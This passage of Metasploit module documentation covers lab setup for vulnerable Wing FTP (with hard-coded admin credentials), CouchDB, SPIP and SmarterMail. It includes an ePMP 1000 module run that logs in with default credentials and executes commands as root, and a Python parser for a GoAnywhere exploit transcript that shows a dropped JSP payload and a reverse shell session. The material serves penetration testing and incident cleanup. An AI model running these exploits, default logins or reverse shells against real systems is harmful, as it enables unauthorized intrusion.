    config.vm.network "forwarded_port", guest: guest, host: host, host_ip: "0.0.0.0", auto_correct: true
  end

  # Single-quoted heredoc: Ruby passes the \" and \r escapes through untouched,
  # so the shell and expect see them as written below.
  config.vm.provision "shell", inline: <<-'SHELL'
    #!/usr/bin/env bash
    set -e

    ADMIN_USER="admin"
    ADMIN_PASS="adminadmin"
    ADMIN_PORT="5466"
    WFTP_URL="https://web.archive.org/web/20250108084555/https://www.wftpserver.com/download/wftpserver-linux-64bit.tar.gz"

    apt-get update
    DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
      wget ca-certificates libssl3 libpam0g libacl1 libcap2 \
      net-tools procps expect curl \
      linux-headers-amd64 build-essential dkms

    mkdir -p /opt/wingftp
    cd /opt/wingftp
    wget -qO wftp.tar.gz "$WFTP_URL"
    tar xzf wftp.tar.gz --strip-components=1
    rm wftp.tar.gz
    chmod +x setup.sh

    # Answer the installer's prompts so provisioning needs no keyboard.
    expect -c "
      spawn /opt/wingftp/setup.sh
      expect \"Enter your administrator name:\" { send \"${ADMIN_USER}\r\" }
      expect \"Enter your administrator password:\" { send \"${ADMIN_PASS}\r\" }
      expect \"Enter your administrator password:\" { send \"${ADMIN_PASS}\r\" }
      expect \"Enter the listener port\" { send \"${ADMIN_PORT}\r\" }
      expect \"Do you want to start Wing FTP Server now?\" { send \"y\r\" }
      expect eof
    "

    systemctl daemon-reload
    systemctl enable wftpserver.service
    systemctl start wftpserver.service
  SHELL

  config.vm.provider "virtualbox" do |vb|
    vb.memory = 512
    vb.cpus = 1
  end
end
```

--------------------------------

### Windows Setup: Download Installer

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md

Provides the download link for the Apache CouchDB 2.3.1 MSI installer for Windows.
```text
https://archive.apache.org/dist/couchdb/binary/win/2.3.1/apache-couchdb-2.3.1.msi
```

--------------------------------

### Download and Setup SPIP

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/spip_rce_form.md

Instructions for downloading a vulnerable SPIP version and serving it locally with PHP's built-in web server on Ubuntu 20.04.

```bash
wget https://files.spip.net/spip/archives/spip-v4.2.0.zip
```

```bash
mkdir spip-site
cp spip-v4.2.0.zip spip-site/
cd spip-site/
unzip spip-v4.2.0.zip
```

```bash
sudo apt install -y php-xml php-zip php-sqlite3
```

```bash
php -S 127.0.0.1:8000
```

--------------------------------

### Example Scenario: Execute 'id; pwd'

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/admin/http/epmp1000_get_chart_cmd_exec.md

Demonstrates a full run: setting RHOSTS, RPORT and CMD, then running the module. The output shows a successful login with the default `installer:installer` credentials, the command executing as root (`uid=0`), and the result being saved to loot.

```metasploit
msf > use auxiliary/scanner/http/epmp1000_get_chart_cmd_exec
msf auxiliary(epmp1000_get_chart_cmd_exec) > set rhosts 1.3.3.7
msf auxiliary(epmp1000_get_chart_cmd_exec) > set rport 80
msf auxiliary(epmp1000_get_chart_cmd_exec) > set CMD id; pwd
msf auxiliary(epmp1000_get_chart_cmd_exec) > run

[+] 1.3.3.7:80 - Running Cambium ePMP 1000 version 3.5...
[*] 1.3.3.7:80 - Attempting to login...
[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "installer":"installer"
[*] 1.3.3.7:80 - Executing id; pwd
uid=0(root) gid=0(root)
/
[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000003_default_1.3.3.7_ePMP_cmd_exec_12345.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

--------------------------------

### SmarterMail Installation (Linux)

Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/smartermail_guid_file_upload.md

Installs SmarterMail on Ubuntu 22 using curl.
Ensure curl and libicu are installed first. Follow the on-screen wizard to complete the setup.

```bash
curl -O https://downloads.smartertools.com/smartermail/100.0.9406/smartermail_9406 \
  && chmod +x smartermail_9406 \
  && sudo ./smartermail_9406 install
```
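The GoAnywhere MFT transcript earlier on this page lists what the exploit module leaves on the target: a created account, a dropped JSP, and cleanup lines whose success is confirmed, unknown, or simply never reported. The Python below is an added example written for this page, not Metasploit Framework code. It parses that kind of msfconsole output into a cleanup checklist so a tester can see what still needs manual verification after a run. The sample transcript is constructed from the lines shown above; the status vocabulary and the rule that a file under a directory the module reports deleted is flagged separately rather than assumed gone are this example's own assumptions.

```python
"""Turn a Metasploit exploit transcript into a target-cleanup checklist.

Added example for this page (not Metasploit Framework code). It recognises the
"Created account", "Dropped payload", "Deleted" and "Tried to delete ... unknown
result" lines printed in the GoAnywhere MFT run shown on this page and reports,
per artifact, whether the module confirmed its removal.
"""
import re

# Constructed sample: the relevant lines of the GoAnywhere MFT run on this page.
SAMPLE_TRANSCRIPT = """\
[*] Started reverse TCP handler on 10.100.1.10:4444
[*] Created account: uchvkpgt:ZindpxggDdvtrxu3
[*] Automatic targeting, detected OS: Linux
[*] Automatic targeting, detected install path: /opt/HelpSystems/GoAnywhere
[*] Dropped payload: /opt/HelpSystems/GoAnywhere/adminroot/EIlMlYdQ.jsp
[+] Deleted /opt/HelpSystems/GoAnywhere/adminroot/EIlMlYdQ.jsp
[!] Tried to delete /opt/HelpSystems/GoAnywhere/userdata/documents/uchvkpgt/EIlMlYdQ.jsp, unknown result
[+] Deleted /opt/HelpSystems/GoAnywhere/userdata/documents/uchvkpgt/
[*] Command shell session 4 opened (10.100.1.10:4444 -> 10.100.1.30:49572) at 2024-01-29 17:49:08 +0000
"""

ACCOUNT_RE = re.compile(r"Created account: (?P<user>[^:\s]+):(?P<password>\S+)")
DROPPED_RE = re.compile(r"Dropped payload: (?P<path>\S+)")
DELETED_RE = re.compile(r"\[\+\] Deleted (?P<path>\S+)")
UNKNOWN_RE = re.compile(r"Tried to delete (?P<path>\S+?), unknown result")
SESSION_RE = re.compile(
    r"session (?P<id>\d+) opened \((?P<lhost>[^:\s]+):(?P<lport>\d+) -> "
    r"(?P<rhost>[^:\s]+):(?P<rport>\d+)\) at (?P<when>.+)$"
)

# Status values are this example's own vocabulary, not Metasploit's.
DELETED, PARENT_DELETED, UNKNOWN, REMAINING = (
    "deleted", "parent directory deleted", "unknown", "remaining")


def extract_artifacts(transcript):
    """Map ('file', path) / ('account', user) to a cleanup status."""
    accounts, dropped, deleted, unknown = [], [], [], []
    for line in transcript.splitlines():
        if m := ACCOUNT_RE.search(line):
            accounts.append(m.group("user"))  # password deliberately not kept
        elif m := DROPPED_RE.search(line):
            dropped.append(m.group("path"))
        elif m := DELETED_RE.search(line):
            deleted.append(m.group("path"))
        elif m := UNKNOWN_RE.search(line):
            unknown.append(m.group("path"))

    def file_status(path):
        if path in deleted:
            return DELETED
        # Assumption: a file under a directory the module reports deleted most
        # likely went with it, but nothing confirmed that, so flag it separately.
        if any(d.endswith("/") and path.startswith(d) for d in deleted):
            return PARENT_DELETED
        if path in unknown:
            return UNKNOWN
        return REMAINING

    artifacts = {}
    for path in dict.fromkeys(dropped + unknown + deleted):  # dedup, keep order
        artifacts[("file", path)] = file_status(path)
    for user in accounts:
        # The run prints no account-removal line, so the account is left behind.
        artifacts[("account", user)] = REMAINING
    return artifacts


def needs_manual_check(transcript):
    """Artifacts whose removal the transcript did not explicitly confirm."""
    return [key for key, status in extract_artifacts(transcript).items()
            if status != DELETED]


def extract_session(transcript):
    """Peer addresses and timestamp of the opened session, for IR correlation."""
    for line in transcript.splitlines():
        if m := SESSION_RE.search(line):
            return m.groupdict()
    return None


if __name__ == "__main__":
    for (kind, name), status in extract_artifacts(SAMPLE_TRANSCRIPT).items():
        print(f"{kind:8} {status:26} {name}")
    print("manual check:", needs_manual_check(SAMPLE_TRANSCRIPT))
    print("session:", extract_session(SAMPLE_TRANSCRIPT))
```

Run as a script it prints one line per artifact. For the sample, `needs_manual_check` returns the JSP copy under the user's document directory (its parent was reported deleted, so verify rather than assume) and the `uchvkpgt` account, which the module never reports removing; `extract_session` returns the listener and target endpoints and the timestamp, which is what a blue team would correlate against the target's connection logs.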